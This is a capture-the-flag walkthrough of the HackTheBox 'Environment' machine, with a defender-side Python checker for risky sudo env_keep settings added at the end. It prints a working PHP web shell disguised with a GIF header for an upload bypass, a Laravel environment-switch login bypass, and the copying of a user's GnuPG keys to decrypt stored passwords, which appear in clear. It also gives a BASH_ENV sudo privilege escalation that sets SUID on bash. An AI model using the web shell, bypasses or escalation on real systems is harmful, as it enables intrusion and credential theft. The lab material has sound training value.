
HackTheBox Environment Walkthrough

The document outlines a penetration testing scenario involving the environment.htb server, detailing the services running, including SSH and HTTP. It describes exploiting a vulnerability to gain access to the user 'hish', retrieving sensitive information, and ultimately escalating privileges to root. The process includes uploading a web shell, executing commands, and manipulating file permissions to achieve root access.

Uploaded by

21r21a6238

Environment

Nmap scan report for [Link] ([Link])


Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 [Link] (ECDSA)
|_ 256 [Link] (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: Save the Environment | [Link]
|_http-server-header: nginx/1.22.1
8000/tcp open http-alt?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

echo "[Link] [Link]" | sudo tee -a /etc/hosts

gobuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link]


/build (Status: 301) [Size: 169] [--> [Link]
/[Link] (Status: 200) [Size: 0]
/[Link] (Status: 200) [Size: 4602]
/logout (Status: 302) [Size: 358] [--> [Link]
/login (Status: 200) [Size: 2391]
/[Link] (Status: 200) [Size: 24]
/storage (Status: 301) [Size: 169] [--> [Link]
/up (Status: 200) [Size: 2126]
/vendor (Status: 301) [Size: 169] [--> [Link]

Go to the login page.
Triggering an error in the remember parameter (&remember=') discloses the environment name: preprod

[Link]
With this PoC, go to the login page, enter some random data, intercept the request, add ?--env=preprod and forward it.
It will redirect you straight to the dashboard of the Hish user.

Save this webshell as [Link].

IMPORTANT: add a dot after php and put an allowed file type's header at the top.
Go to the profile section and upload it:

GIF87a
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="cmd" id="cmd" size="80">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>
[Link]("cmd").focus();
</script>
</html>

You will get a shell as www-data:

cat /home/hish/[Link]

bash-5.2$ ls /home/hish
backup [Link]
bash-5.2$ ls /home/hish/backup/
[Link]

cd /home/backup
python3 -m [Link] 8080
wget [Link]:8080/[Link]

cd ../
tar -czf /tmp/[Link] ./.gnupg
cd /tmp
python3 -m [Link] 8080

wget [Link]:8080/[Link]
tar -xzf [Link]
mv ~/.gnupg ~/Documents # save our .gnupg
mv .gnupg ~/ # move hish's .gnupg into our home dir
gpg --decrypt [Link]
gpg: WARNING: unsafe permissions on homedir
gpg: encrypted with rsa2048 key, ID B755B0EDD6CFCFD3, created 2025-01-11
"hish_ <hish@[Link]>"
[Link] -> Ihaves0meMon$yhere123
[Link] -> marineSPm@ster!!
[Link] -> summerSunnyB3ACH!!

ssh hish@[Link]
marineSPm@ster!!

For Root

-bash-5.2$ sudo -l
Matching Defaults entries for hish on environment:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+="ENV BASH_ENV", use_pty
User hish may run the following commands on environment:
(ALL) /usr/bin/systeminfo

echo -e '#!/bin/bash\nchmod +s /bin/bash' > [Link]


chmod 777 [Link]
sudo BASH_ENV=[Link] /usr/bin/systeminfo

/bin/bash -p
cat /root/[Link]
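
Added example (not part of the original walkthrough): a defender-side check that reads sudo Defaults text, such as the sudo -l output above, and reports env_keep entries that let the calling user control shell startup files or the dynamic loader. The function name, the list of risky variables and the sample input are assumptions made for this illustration; it only looks at explicit env_keep settings, not sudo's built-in defaults.

```python
import fnmatch
import re

# Variables that alter what a shell or the dynamic loader runs at startup.
# Illustrative list assumed for this example; extend it for your own estate.
RISKY_ENV = {
    "BASH_ENV": "bash sources this file before running a non-interactive script",
    "ENV": "sh and POSIX-mode shells source this file when interactive",
    "LD_PRELOAD": "dynamic loader loads this shared object first",
    "LD_LIBRARY_PATH": "dynamic loader searches these directories first",
}

_ENV_KEEP = re.compile(r'env_keep\s*([+-]?=)\s*("[^"]*"|[^\s,]+)')


def risky_env_keep(text):
    """Return the sorted RISKY_ENV names that env_keep settings in text preserve."""
    # Drop comment lines, then rejoin on whitespace: sudo -l wraps long lines.
    lines = [l for l in text.splitlines() if not l.lstrip().startswith("#")]
    flat = " ".join(" ".join(lines).split())
    patterns = set()
    for op, value in _ENV_KEEP.findall(flat):
        names = set(value.strip('"').split())
        if op == "=":
            patterns = names          # '=' replaces the list
        elif op == "-=":
            patterns -= names         # '-=' removes entries
        else:
            patterns |= names         # '+=' appends entries
    # env_keep entries may be wildcards (e.g. LC_*), so match as patterns.
    return sorted(
        var for var in RISKY_ENV
        if any(fnmatch.fnmatchcase(var, pat) for pat in patterns)
    )


# Constructed sample modelled on the sudo -l output above, line wrap included.
SAMPLE = '''Matching Defaults entries for hish on environment:
    env_reset, mail_badpass, env_keep+="ENV
    BASH_ENV", use_pty
'''

if __name__ == "__main__":
    for var in risky_env_keep(SAMPLE):
        print(f"env_keep preserves {var}: {RISKY_ENV[var]}")
```

On a host configured like the one above, the mitigation is to remove ENV and BASH_ENV from env_keep in sudoers so that env_reset strips them before the sudo-permitted command runs.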
